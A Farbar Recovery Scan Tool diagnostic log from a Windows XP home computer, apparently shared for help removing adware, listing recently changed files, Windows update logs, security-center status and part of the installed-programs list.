2014-08-10 19:41 - 2014-08-10 19:41 - 00023603 _____ () C:\ComboFix.txt
2014-08-10 19:41 - 2014-08-10 19:41 - 00000000 ____D () C:\Documents and Settings\NetworkService\Local Settings\temp
2014-08-10 19:41 - 2014-08-10 19:41 - 00000000 ____D () C:\Documents and Settings\Administrator\Local Settings\temp
2014-08-10 19:02 - 2014-08-16 15:39 - 00000000 ____D () C:\Program Files\Groovorio
2014-08-10 19:02 - 2014-08-10 19:41 - 00000000 ____D () C:\Qoobox
2014-08-10 19:02 - 2014-08-10 19:02 - 00000000 ____D () C:\Program Files\ToggleMark
2014-08-10 19:02 - 2011-06-26 00:45 - 00256000 _____ () C:\WINDOWS\PEV.exe
2014-08-10 19:02 - 2010-11-07 11:20 - 00208896 _____ () C:\WINDOWS\MBR.exe
2014-08-10 19:02 - 2009-04-19 22:56 - 00060416 _____ (NirSoft) C:\WINDOWS\NIRCMD.exe
2014-08-10 19:02 - 2000-08-30 18:00 - 00518144 _____ (SteelWerX) C:\WINDOWS\SWREG.exe
2014-08-10 19:02 - 2000-08-30 18:00 - 00406528 _____ (SteelWerX) C:\WINDOWS\SWSC.exe
2014-08-10 19:02 - 2000-08-30 18:00 - 00212480 _____ (SteelWerX) C:\WINDOWS\SWXCACLS.exe
2014-08-10 19:02 - 2000-08-30 18:00 - 00098816 _____ () C:\WINDOWS\sed.exe
2014-08-10 19:02 - 2000-08-30 18:00 - 00080412 _____ () C:\WINDOWS\grep.exe
2014-08-10 19:02 - 2000-08-30 18:00 - 00068096 _____ () C:\WINDOWS\zip.exe
2014-08-10 18:59 - 2014-08-10 18:59 - 00000000 ____D () C:\Documents and Settings\Jay\My Documents\Optimizer Pro
2014-08-10 18:59 - 2014-08-10 18:59 - 00000000 ____D () C:\Documents and Settings\Jay\Application Data\VOPackage
2014-08-10 18:58 - 2014-08-10 18:59 - 00000000 ____D () C:\Documents and Settings\Jay\Local Settings\Application Data\Linkey
2014-08-10 18:58 - 2014-08-10 18:58 - 00000000 ____D () C:\Program Files\Settings Manager
2014-08-10 18:58 - 2014-08-10 18:58 - 00000000 ____D () C:\Documents and Settings\Jay\Application Data\FirefoxToolbar
2014-08-10 18:57 - 2014-08-21 21:37 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\smdmf
2014-08-10 18:57 - 2014-08-14 23:12 - 00000000 ____D () C:\Program Files\005
2014-08-10 18:54 - 2014-08-10 18:54 - 00000000 ____D () C:\Documents and Settings\Jay\Local Settings\Application Data\SearchProtect
2014-08-10 18:54 - 2014-08-10 18:54 - 00000000 _____ () C:\END
2014-08-10 14:35 - 2010-08-30 08:34 - 00536576 _____ (SQLite Development Team) C:\WINDOWS\system32\sqlite3.dll
2014-08-10 14:32 - 2014-08-10 15:55 - 00000000 ____D () C:\AdwCleaner
2014-08-10 14:31 - 2014-08-10 14:31 - 01366203 _____ () C:\Documents and Settings\Jay\Desktop\AdwCleaner.exe
2014-08-10 14:28 - 2014-08-10 14:30 - 00000000 ____D () C:\Program Files\Mozilla Firefox

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-08-21 21:37 - 2014-08-10 18:57 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\smdmf
2014-08-21 21:36 - 2014-08-10 19:41 - 00000000 ____D () C:\Documents and Settings\Jay\Local Settings\temp
2014-08-21 21:35 - 2014-08-21 21:35 - 00000000 ____D () C:\FRST
2014-08-21 21:33 - 2006-07-19 20:11 - 01762402 _____ () C:\WINDOWS\WindowsUpdate.log
2014-08-21 21:32 - 2014-08-17 12:00 - 00011864 _____ () C:\WINDOWS\KB2929961.log
2014-08-21 21:32 - 2014-08-17 11:38 - 00010910 _____ () C:\WINDOWS\KB2691442.log
2014-08-21 21:32 - 2014-08-17 11:38 - 00010850 _____ () C:\WINDOWS\KB2719985.log
2014-08-21 21:31 - 2014-08-21 21:31 - 00000000 ____D () C:\WINDOWS\LastGood
2014-08-21 21:30 - 2011-09-02 17:22 - 00000000 ____D () C:\Program Files\SUPERAntiSpyware
2014-08-21 21:23 - 2012-07-11 22:15 - 00000364 ____H () C:\WINDOWS\Tasks\avast! Emergency Update.job
2014-08-21 21:22 - 2013-03-21 12:14 - 00000876 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2014-08-21 21:22 - 2010-10-10 11:26 - 00000000 ____D () C:\Program Files\Spybot - Search & Destroy
2014-08-21 21:22 - 2006-07-19 20:11 - 00001158 _____ () C:\WINDOWS\system32\wpa.dbl
2014-08-21 21:22 - 2006-07-19 20:11 - 00000006 ____H () C:\WINDOWS\Tasks\SA.DAT
2014-08-21 21:22 - 2006-07-19 12:40 - 00000159 _____ () C:\WINDOWS\wiadebug.log
2014-08-21 21:22 - 2006-07-19 12:40 - 00000049 _____ () C:\WINDOWS\wiaservc.log
2014-08-21 21:21 - 2006-07-19 20:11 - 00032412 _____ () C:\WINDOWS\SchedLgU.Txt
2014-08-21 21:20 - 2010-10-10 11:26 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Spybot - Search & Destroy
2014-08-21 21:20 - 2007-04-18 17:05 - 00000178 ___SH () C:\Documents and Settings\Jay\ntuser.ini
2014-08-21 21:20 - 2007-04-18 17:05 - 00000000 ____D () C:\Documents and Settings\Jay
2014-08-21 21:12 - 2007-04-25 15:00 - 00000178 ___SH () C:\Documents and Settings\Jenny\ntuser.ini
2014-08-21 21:12 - 2007-04-25 15:00 - 00000000 ____D () C:\Documents and Settings\Jenny
2014-08-21 21:11 - 2013-03-21 12:14 - 00000880 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2014-08-21 21:01 - 2013-12-05 17:13 - 00000830 _____ () C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2014-08-21 19:56 - 2011-09-02 22:18 - 00000000 ____D () C:\Documents and Settings\Jenny\Local Settings\temp
2014-08-21 19:54 - 2011-10-29 14:48 - 00497256 _____ () C:\WINDOWS\setupapi.log
2014-08-21 14:01 - 2006-07-19 20:05 - 00000000 ____D () C:\WINDOWS\Microsoft.NET
2014-08-21 12:47 - 2014-08-17 12:01 - 00011954 _____ () C:\WINDOWS\KB2916036.log
2014-08-21 12:47 - 2014-08-17 12:01 - 00011952 _____ () C:\WINDOWS\KB2922229.log
2014-08-21 12:47 - 2014-08-17 12:01 - 00011944 _____ () C:\WINDOWS\KB2868626.log
2014-08-21 12:47 - 2014-08-17 11:38 - 00011022 _____ () C:\WINDOWS\KB2712808.log
2014-08-21 12:46 - 2014-08-17 12:00 - 00086464 _____ () C:\WINDOWS\KB2936068-IE7.log
2014-08-21 12:46 - 2014-08-17 12:00 - 00011944 _____ () C:\WINDOWS\KB2847311.log
2014-08-21 12:46 - 2014-08-17 12:00 - 00011867 _____ () C:\WINDOWS\KB2898715.log
2014-08-21 12:46 - 2014-08-17 12:00 - 00011779 _____ () C:\WINDOWS\KB2802968.log
2014-08-21 12:46 - 2014-08-17 11:38 - 00011131 _____ () C:\WINDOWS\KB2655992.log
2014-08-21 12:46 - 2014-08-17 11:38 - 00010938 _____ () C:\WINDOWS\KB2585542.log
2014-08-21 12:46 - 2014-08-17 11:38 - 00010691 _____ () C:\WINDOWS\KB2631813.log
2014-08-21 12:46 - 2014-08-17 11:38 - 00010600 _____ () C:\WINDOWS\KB2598479.log
2014-08-21 12:45 - 2014-08-17 12:00 - 00012862 _____ () C:\WINDOWS\KB2909212.log
2014-08-21 12:39 - 2014-08-17 11:59 - 00011708 _____ () C:\WINDOWS\KB2780091.log
2014-08-21 12:38 - 2014-08-17 11:40 - 00012559 _____ () C:\WINDOWS\KB2930275.log
2014-08-21 12:38 - 2014-08-17 11:40 - 00011815 _____ () C:\WINDOWS\KB2862152.log
2014-08-21 12:38 - 2014-08-17 11:40 - 00011785 _____ () C:\WINDOWS\KB2876217.log
2014-08-21 12:38 - 2014-08-17 11:40 - 00011779 _____ () C:\WINDOWS\KB2864063.log
2014-08-21 12:26 - 2009-10-25 15:49 - 00000000 ____D () C:\Program Files\Microsoft Silverlight
2014-08-21 12:26 - 2006-07-19 20:00 - 00347400 _____ () C:\WINDOWS\system32\FNTCACHE.DAT
2014-08-18 22:58 - 2014-08-18 22:58 - 00000000 ____D () C:\4ea9f4d50c4d13298e29e45991c07f
2014-08-18 22:58 - 2006-07-19 20:11 - 01176233 _____ () C:\WINDOWS\tsoc.log
2014-08-18 22:58 - 2006-07-19 20:11 - 00846930 _____ () C:\WINDOWS\iis6.log
2014-08-18 22:58 - 2006-07-19 20:01 - 02563278 _____ () C:\WINDOWS\FaxSetup.log
2014-08-18 22:58 - 2006-07-19 20:01 - 01243769 _____ () C:\WINDOWS\ocgen.log
2014-08-18 22:58 - 2006-07-19 20:01 - 00833778 _____ () C:\WINDOWS\comsetup.log
2014-08-18 22:58 - 2006-07-19 20:01 - 00796358 _____ () C:\WINDOWS\msmqinst.log
2014-08-18 22:58 - 2006-07-19 20:01 - 00505896 _____ () C:\WINDOWS\ntdtcsetup.log
2014-08-18 22:58 - 2006-07-19 20:01 - 00447502 _____ () C:\WINDOWS\netfxocm.log
2014-08-18 22:58 - 2006-07-19 20:01 - 00176996 _____ () C:\WINDOWS\MedCtrOC.log
2014-08-18 22:58 - 2006-07-19 20:01 - 00137476 _____ () C:\WINDOWS\ocmsn.log
2014-08-18 22:58 - 2006-07-19 20:01 - 00128338 _____ () C:\WINDOWS\tabletoc.log
2014-08-18 22:58 - 2006-07-19 20:01 - 00128263 _____ () C:\WINDOWS\msgsocm.log
2014-08-18 22:58 - 2006-07-19 20:01 - 00001374 _____ () C:\WINDOWS\imsins.log
2014-08-18 22:57 - 2014-08-18 22:57 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2770660$
2014-08-18 22:57 - 2009-12-02 22:43 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Microsoft Help
2014-08-18 22:56 - 2014-08-18 22:56 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2850869$
2014-08-18 22:56 - 2014-08-17 11:40 - 00142501 _____ () C:\WINDOWS\KB2850869.log
2014-08-18 22:56 - 2006-07-19 20:01 - 00001374 _____ () C:\WINDOWS\imsins.BAK
2014-08-18 22:56 - 2006-07-19 19:58 - 00344115 _____ () C:\WINDOWS\updspapi.log
2014-08-18 22:55 - 2014-08-18 22:55 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2876331$
2014-08-18 22:55 - 2014-08-18 22:55 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2859537$
2014-08-18 22:55 - 2014-08-18 22:54 - 00136378 _____ () C:\WINDOWS\KB2807986.log
2014-08-18 22:55 - 2014-08-17 11:40 - 00141957 _____ () C:\WINDOWS\KB2876331.log
2014-08-18 22:55 - 2014-08-17 11:39 - 00142756 _____ () C:\WINDOWS\KB2859537.log
2014-08-18 22:54 - 2014-08-18 22:54 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2807986$
2014-08-18 22:54 - 2006-07-19 19:58 - 00000000 ___HD () C:\WINDOWS\$hf_mig$
2014-08-18 22:53 - 2006-07-19 20:06 - 00006276 _____ () C:\WINDOWS\system32\PerfStringBackup.INI
2014-08-18 22:43 - 2014-08-18 22:43 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2868038$
2014-08-18 22:43 - 2014-08-18 22:42 - 00133967 _____ () C:\WINDOWS\KB2868038.log
2014-08-18 22:42 - 2014-08-17 11:39 - 00142864 _____ () C:\WINDOWS\KB2820917.log
2014-08-18 22:41 - 2014-08-18 22:41 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2820917$
2014-08-18 22:37 - 2014-08-18 22:37 - 00133872 _____ () C:\WINDOWS\KB2603381.log
2014-08-18 22:37 - 2014-08-18 22:37 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2893294$
2014-08-18 22:37 - 2014-08-18 22:37 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2757638$
2014-08-18 22:37 - 2014-08-18 22:37 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2603381$
2014-08-18 22:37 - 2014-08-17 11:39 - 00141918 _____ () C:\WINDOWS\KB2757638.log
2014-08-18 22:37 - 2014-08-17 11:39 - 00139690 _____ () C:\WINDOWS\KB2893294.log
2014-08-18 22:35 - 2014-08-18 22:35 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2749655$
2014-08-18 22:35 - 2014-08-18 22:35 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2653956$
2014-08-18 22:35 - 2014-08-17 11:39 - 00142032 _____ () C:\WINDOWS\KB2749655.log
2014-08-18 22:35 - 2014-08-17 11:37 - 00139623 _____ () C:\WINDOWS\KB2653956.log
2014-08-18 22:33 - 2010-06-05 09:14 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\Microsoft Silverlight
2014-08-18 22:33 - 2007-10-25 20:31 - 00000000 ____D () C:\Documents and Settings\Jay\Desktop\hijackthis
2014-08-18 22:32 - 2014-08-18 22:32 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2892075$
2014-08-18 22:32 - 2014-08-18 22:31 - 00013937 _____ () C:\WINDOWS\KB2698365.log
2014-08-18 22:32 - 2014-08-17 11:39 - 00018123 _____ () C:\WINDOWS\KB2892075.log
2014-08-18 22:31 - 2014-08-18 22:31 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2698365$
2014-08-18 22:31 - 2014-08-18 22:31 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2619339$
2014-08-18 22:31 - 2014-08-17 11:37 - 00019056 _____ () C:\WINDOWS\KB2619339.log
2014-08-18 22:30 - 2014-08-18 22:30 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2705219-v2$
2014-08-18 22:30 - 2014-08-17 11:39 - 00020643 _____ () C:\WINDOWS\KB2705219-v2.log
2014-08-18 22:25 - 2014-08-18 22:25 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2727528$
2014-08-18 22:25 - 2014-08-18 22:24 - 00012472 _____ () C:\WINDOWS\KB2723135-v2.log
2014-08-18 22:25 - 2014-08-17 11:39 - 00019333 _____ () C:\WINDOWS\KB2727528.log
2014-08-18 22:24 - 2014-08-18 22:24 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2723135-v2$
2014-08-18 22:23 - 2014-08-18 22:23 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2862330$
2014-08-18 22:19 - 2014-08-17 11:30 - 00019733 _____ () C:\WINDOWS\KB2813345.log
2014-08-18 22:18 - 2014-08-18 22:18 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2813345$
2014-08-18 22:15 - 2014-08-17 11:30 - 00021923 _____ () C:\WINDOWS\KB2676562.log
2014-08-18 22:15 - 2006-07-19 19:43 - 00000719 _____ () C:\WINDOWS\win.ini
2014-08-18 22:14 - 2014-08-18 22:14 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2676562$
2014-08-18 22:08 - 2009-08-22 14:09 - 00000000 ____D () C:\WINDOWS\system32\XPSViewer
2014-08-18 21:43 - 2014-08-17 11:28 - 00017799 _____ () C:\WINDOWS\KB2620712.log
2014-08-18 21:42 - 2014-08-18 21:42 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2620712$
2014-08-18 21:40 - 2014-08-18 21:40 - 00008357 _____ () C:\WINDOWS\KB2914368.log
2014-08-18 21:40 - 2014-08-18 21:40 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2914368$
2014-08-18 21:40 - 2014-08-18 21:40 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2584146$
2014-08-18 21:40 - 2014-08-17 11:25 - 00016947 _____ () C:\WINDOWS\KB2584146.log
2014-08-17 21:42 - 2014-08-17 12:54 - 00015602 _____ () C:\Documents and Settings\Jay\Desktop\Stock Tracker.xlsx
2014-08-17 12:54 - 2014-08-17 12:54 - 00000165 ____H () C:\Documents and Settings\Jay\Desktop\~$Stock Tracker.xlsx
2014-08-17 12:07 - 2012-02-15 17:00 - 00000000 ____D () C:\Documents and Settings\Jenny\My Documents\Pampered Chef
2014-08-17 12:05 - 2009-12-02 23:35 - 00107008 ___SH () C:\Documents and Settings\Jenny\Desktop\Thumbs.db
2014-08-17 08:59 - 2006-07-19 20:10 - 00000000 ____D () C:\WINDOWS\Help
2014-08-16 15:59 - 2008-10-23 16:45 - 00000000 ____D () C:\WINDOWS\system32\Adobe
2014-08-16 15:59 - 2007-04-29 00:37 - 00000000 ____D () C:\Documents and Settings\Jay\Application Data\Adobe
2014-08-16 15:59 - 2007-04-18 17:15 - 00000000 ____D () C:\Documents and Settings\Jay\Application Data\Macromedia
2014-08-16 15:59 - 2006-07-19 19:42 - 00000000 ____D () C:\WINDOWS\system32\Macromed
2014-08-16 15:40 - 2014-08-16 15:40 - 00000000 ____D () C:\Program Files\predm
2014-08-16 15:39 - 2014-08-10 19:02 - 00000000 ____D () C:\Program Files\Groovorio
2014-08-15 22:54 - 2014-08-10 19:59 - 00022758 _____ () C:\Documents and Settings\Jay\Desktop\attach.txt
2014-08-15 22:54 - 2014-08-10 19:59 - 00018225 _____ () C:\Documents and Settings\Jay\Desktop\dds.txt
2014-08-14 23:12 - 2014-08-10 18:57 - 00000000 ____D () C:\Program Files\005
2014-08-14 23:09 - 2014-08-10 19:46 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Browser System Enahncer
2014-08-10 22:12 - 2006-07-19 19:46 - 00000000 __SHD () C:\Documents and Settings\NetworkService
2014-08-10 20:57 - 2013-04-09 20:48 - 00002503 _____ () C:\Documents and Settings\Jay\Desktop\Launch Google Earth.lnk
2014-08-10 20:49 - 2006-07-19 19:46 - 00000000 __SHD () C:\Documents and Settings\LocalService
2014-08-10 19:59 - 2014-08-10 19:57 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\ea5b54591d578367
2014-08-10 19:46 - 2014-08-10 19:46 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\2308189059
2014-08-10 19:41 - 2014-08-10 19:41 - 00023603 _____ () C:\ComboFix.txt
2014-08-10 19:41 - 2014-08-10 19:41 - 00000000 ____D () C:\Documents and Settings\NetworkService\Local Settings\temp
2014-08-10 19:41 - 2014-08-10 19:41 - 00000000 ____D () C:\Documents and Settings\Administrator\Local Settings\temp
2014-08-10 19:41 - 2014-08-10 19:02 - 00000000 ____D () C:\Qoobox
2014-08-10 19:33 - 2014-08-18 22:44 - 00000027 _____ () C:\WINDOWS\system32\Drivers\etc\hosts.20140818-224430.backup
2014-08-10 19:33 - 2006-07-19 12:37 - 00000435 _____ () C:\WINDOWS\system.ini
2014-08-10 19:31 - 2010-10-13 18:05 - 00008192 ____H () C:\WINDOWS\system32\config\SECURITY.tmp.LOG
2014-08-10 19:31 - 2006-07-19 20:11 - 39059456 _____ () C:\WINDOWS\system32\config\software.bak
2014-08-10 19:31 - 2006-07-19 20:11 - 07340032 _____ () C:\WINDOWS\system32\config\system.bak
2014-08-10 19:31 - 2006-07-19 20:11 - 00524288 _____ () C:\WINDOWS\system32\config\default.bak
2014-08-10 19:31 - 2006-07-19 20:11 - 00262144 _____ () C:\WINDOWS\system32\config\SECURITY.bak
2014-08-10 19:31 - 2006-07-19 20:11 - 00028672 _____ () C:\WINDOWS\system32\config\SAM.bak
2014-08-10 19:30 - 2010-10-11 19:40 - 00000000 ____D () C:\WINDOWS\ERDNT
2014-08-10 19:13 - 2006-07-19 20:11 - 00000000 ____D () C:\WINDOWS\system32\Restore
2014-08-10 19:02 - 2014-08-10 19:02 - 00000000 ____D () C:\Program Files\ToggleMark
2014-08-10 18:59 - 2014-08-10 18:59 - 00000000 ____D () C:\Documents and Settings\Jay\My Documents\Optimizer Pro
2014-08-10 18:59 - 2014-08-10 18:59 - 00000000 ____D () C:\Documents and Settings\Jay\Application Data\VOPackage
2014-08-10 18:59 - 2014-08-10 18:58 - 00000000 ____D () C:\Documents and Settings\Jay\Local Settings\Application Data\Linkey
2014-08-10 18:58 - 2014-08-10 18:58 - 00000000 ____D () C:\Program Files\Settings Manager
2014-08-10 18:58 - 2014-08-10 18:58 - 00000000 ____D () C:\Documents and Settings\Jay\Application Data\FirefoxToolbar
2014-08-10 18:54 - 2014-08-10 18:54 - 00000000 ____D () C:\Documents and Settings\Jay\Local Settings\Application Data\SearchProtect
2014-08-10 18:54 - 2014-08-10 18:54 - 00000000 _____ () C:\END
2014-08-10 15:57 - 2012-04-24 22:36 - 00000000 ____D () C:\Program Files\Mozilla Maintenance Service
2014-08-10 15:55 - 2014-08-10 14:32 - 00000000 ____D () C:\AdwCleaner
2014-08-10 14:31 - 2014-08-10 14:31 - 01366203 _____ () C:\Documents and Settings\Jay\Desktop\AdwCleaner.exe
2014-08-10 14:30 - 2014-08-10 14:28 - 00000000 ____D () C:\Program Files\Mozilla Firefox
2014-08-10 13:38 - 2010-06-28 22:42 - 00000458 _____ () C:\rkill.log
2014-08-02 17:03 - 2006-07-19 19:41 - 00000000 ____D () C:\WINDOWS\system32\FxsTmp
2014-07-25 23:52 - 2010-01-29 13:10 - 00000000 ____D () C:\Program Files\Atrinsic
2014-07-25 23:51 - 2012-09-02 16:32 - 00005632 ___SH () C:\WINDOWS\Thumbs.db
2014-07-25 23:51 - 2007-04-28 03:44 - 00007168 _____ () C:\Documents and Settings\Jay\Local Settings\Application Data\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2014-07-25 21:36 - 2008-10-18 13:42 - 00001324 _____ () C:\WINDOWS\system32\d3d9caps.dat
2014-07-23 13:54 - 2013-04-12 16:55 - 00000000 ____D () C:\Documents and Settings\Jay\My Documents\My Scans

Files to move or delete:
====================
C:\Documents and Settings\Jenny\PPPlus-Jennifer-Eatchel-20111221-1532.dat
C:\Documents and Settings\Jenny\PPPlus-Jennifer-Eatchel-20120224-1833.dat
C:\Documents and Settings\Jenny\PPPlus-Jennifer-Eatchel-20120331-1231.dat
C:\Documents and Settings\Jenny\PPPlus-Jennifer-Eatchel-20120925-2039.dat
C:\Documents and Settings\Jenny\PPPlus-Jennifer-Eatchel-20121213-2244.dat


Some content of TEMP:
====================
C:\Documents and Settings\Jay\Local Settings\temp\nsc32B.tmp.exe
C:\Documents and Settings\Jenny\Local Settings\temp\jre-6u29-windows-i586-iftw-rv.exe


==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed

==================== End Of Log ============================

 

Additional scan result of Farbar Recovery Scan Tool (x86) Version:21-08-2014
Ran by Jay at 2014-08-21 21:38:21
Running from C:\Documents and Settings\Jay\My Documents\Downloads
Boot Mode: Normal
==========================================================


==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: avast! Internet Security (Disabled - Up to date) {7591DB91-41F0-48A3-B128-1A293FD8233D}
FW: avast! Internet Security (Disabled) {7591DB91-41F0-48A3-B128-1A293FD8233D}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

2007 Microsoft Office system (HKLM\...\PROHYBRIDR) (Version: 12.0.6425.1000 - Microsoft Corporation)
32 Bit HP CIO Components Installer (Version: 7.1.8 - Hewlett-Packard) Hidden
Acer eDataSecurity Management (Version: 2.0.3077 - Acer) Hidden
Acer WLAN 11g USB Dongle (HKLM\...\InstallShield_{0CB98AC0-D691-4B21-AD3D-95982517021D}) (Version: 1.0.8 - ACER Inc.)
Acer WLAN 11g USB Dongle (Version: 1.0.8 - ACER Inc.) Hidden
Actiontec Gateway (HKLM\...\{9692FD03-6662-4E62-B08C-30DFF51651E1}) (Version:  - )
Adobe AIR (HKLM\...\Adobe AIR) (Version: 13.0.0.111 - Adobe Systems Incorporated)
Adobe AIR (Version: 13.0.0.111 - Adobe Systems Incorporated) Hidden
Adobe Flash Player 14 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 14.0.0.145 - Adobe Systems Incorporated)
Adobe Flash Player 14 Plugin (HKLM\...\Adobe Flash Player Plugin) (Version: 14.0.0.145 - Adobe Systems Incorporated)
Adobe Photoshop Elements 2.0 (HKLM\...\Adobe Photoshop Elements 2.0) (Version: 2.0 - Adobe Systems, Inc.)
Adobe Reader XI (11.0.08) (HKLM\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.08 - Adobe Systems Incorporated)
Amazon Games & Software Downloader (HKLM\...\Amazon Games & Software Downloader_is1) (Version: 2.0.0.0 - Amazon)
Angry Birds (HKLM\...\{2F7D5734-056F-4A0A-A1C7-CA1AAE5BB1EB}) (Version: 1.6.3.1 - Rovio)
Apple Application Support (HKLM\...\{F5266D28-E0B2-4130-BFC5-EE155AD514DC}) (Version: 2.3 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{D4DDFAA1-EC37-4529-AD5B-A433ADE68662}) (Version: 6.0.0.59 - Apple Inc.)
Apple Software Update (HKLM\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
avast! Internet Security (HKLM\...\avast) (Version: 8.0.1489.0 - AVAST Software)
Bonjour (HKLM\...\{79155F2B-9895-49D7-8612-D92580E0DE5B}) (Version: 3.0.0.10 - Apple Inc.)
Browser System Enahncer (HKLM\...\{5F189DF5-2D05-472B-9091-84D9848AE48B}{19275d4b}) (Version:  - WorldLoad) <==== ATTENTION
BufferChm (Version: 140.0.212.000 - Hewlett-Packard) Hidden
Canon Camera WIA Driver (Version: 5.3 - Canon) Hidden
Canon Camera WIA Driver (Version: 5.4 - Canon) Hidden
Canon Camera WIA Driver (Version: 5.5 - Canon) Hidden
Canon EOS 20D WIA Driver (HKLM\...\InstallShield_{ED9775A0-383E-4EAA-8DA5-8CC6860D60A3}) (Version: 5.4 - Canon)
Canon EOS-1D Mark II WIA Driver (HKLM\...\InstallShield_{C537C86E-22C0-41CF-8A8E-3B23E986C3D9}) (Version: 5.3 - Canon)
Canon EOS-1Ds Mark II WIA Driver (HKLM\...\InstallShield_{652C4ADF-0A29-4B02-9211-EE61675847DE}) (Version: 5.5 - Canon)
CANON iMAGE GATEWAY Task for ZoomBrowser EX (HKLM\...\CANON iMAGE GATEWAY Task) (Version: 1.7.2.11 - Canon Inc.)
Canon Internet Library for ZoomBrowser EX (HKLM\...\Canon Internet Library for ZoomBrowser EX) (Version: 1.6.3.9 - Canon Inc.)
Canon MOV Decoder (HKLM\...\Canon MOV Decoder) (Version: 1.5.0.7 - Canon Inc.)
Canon MOV Encoder (HKLM\...\Canon MOV Encoder) (Version: 1.3.1.3 - Canon Inc.)
Canon MovieEdit Task for ZoomBrowser EX (HKLM\...\MovieEditTask) (Version: 3.4.1.9 - Canon Inc.)
Canon Utilities Digital Photo Professional 3.8 (HKLM\...\DPP) (Version: 3.8.1.0 - Canon Inc.)
Canon Utilities EOS Capture 1.2 (HKLM\...\InstallShield_{74BE7519-41A7-45A8-8AA6-78C7907A4808}) (Version: 1.2 - Canon)
Canon Utilities EOS Utility (HKLM\...\EOS Utility) (Version: 2.8.1.0 - Canon Inc.)
Canon Utilities EOS Viewer Utility 1.2 (HKLM\...\InstallShield_{750CF8D7-4B04-404F-AFA2-14C129C42373}) (Version: 1.2.1 - Canon)
Canon Utilities Original Data Security Tools (HKLM\...\Original Data Security Tools) (Version: 1.8.0.1 - Canon Inc.)
Canon Utilities PhotoStitch (HKLM\...\PhotoStitch) (Version: 3.1.22.46 - Canon Inc.)
Canon Utilities Picture Style Editor (HKLM\...\Picture Style Editor) (Version: 1.7.0.0 - Canon Inc.)
Canon Utilities WFT Utility (HKLM\...\WFTK) (Version: 3.5.1.1 - Canon Inc.)
Canon Utilities ZoomBrowser EX (HKLM\...\ZoomBrowser EX) (Version: 6.5.1.15 - Canon Inc.)
Canon ZoomBrowser EX Memory Card Utility (HKLM\...\ZoomBrowser EX Memory Card Utility) (Version: 1.3.0.4 - Canon Inc.)
Cisco Connect (HKLM\...\Cisco Connect) (Version: 1.4.13025.0 - Cisco Consumer Products LLC)
Critical Update for Windows Media Player 11 (KB959772) (HKLM\...\KB959772_WM11) (Version:  - Microsoft Corporation)
D110 (Version: 140.0.283.000 - Hewlett-Packard) Hidden
Destinations (Version: 140.0.77.000 - Hewlett-Packard) Hidden
DeviceDiscovery (Version: 140.0.212.000 - Hewlett-Packard) Hidden
EOS Capture 1.2 (Version: 1.2 - Canon) Hidden
EOS Viewer Utility 1.2.1 (Version: 1.2.1 - Canon) Hidden
Farm Mania (HKLM\...\Farm Mania_is1) (Version:  - )
FileZilla Client 3.1.1.1 (HKCU\...\FileZilla Client) (Version: 3.1.1.1 - )
Frog Frenzy 2 (HKLM\...\{3323D8AC-5821-4A8F-8064-46DE657834CE}) (Version: 2.00.0000 - Cosmi Corporation)
Google Chrome (HKLM\...\Google Chrome) (Version: 36.0.1985.125 - Google Inc.)
Google Earth (HKLM\...\{407B9B5C-DAC5-4F44-A756-B57CAB4E6A8B}) (Version: 4.1.7087.5048 - Google)
Google Toolbar for Internet Explorer (Version: 4.0.0.002 - Google Inc.) Hidden
Google Update Helper (Version: 1.3.24.15 - Google Inc.) Hidden
GPBaseService2 (Version: 140.0.211.000 - Hewlett-Packard) Hidden
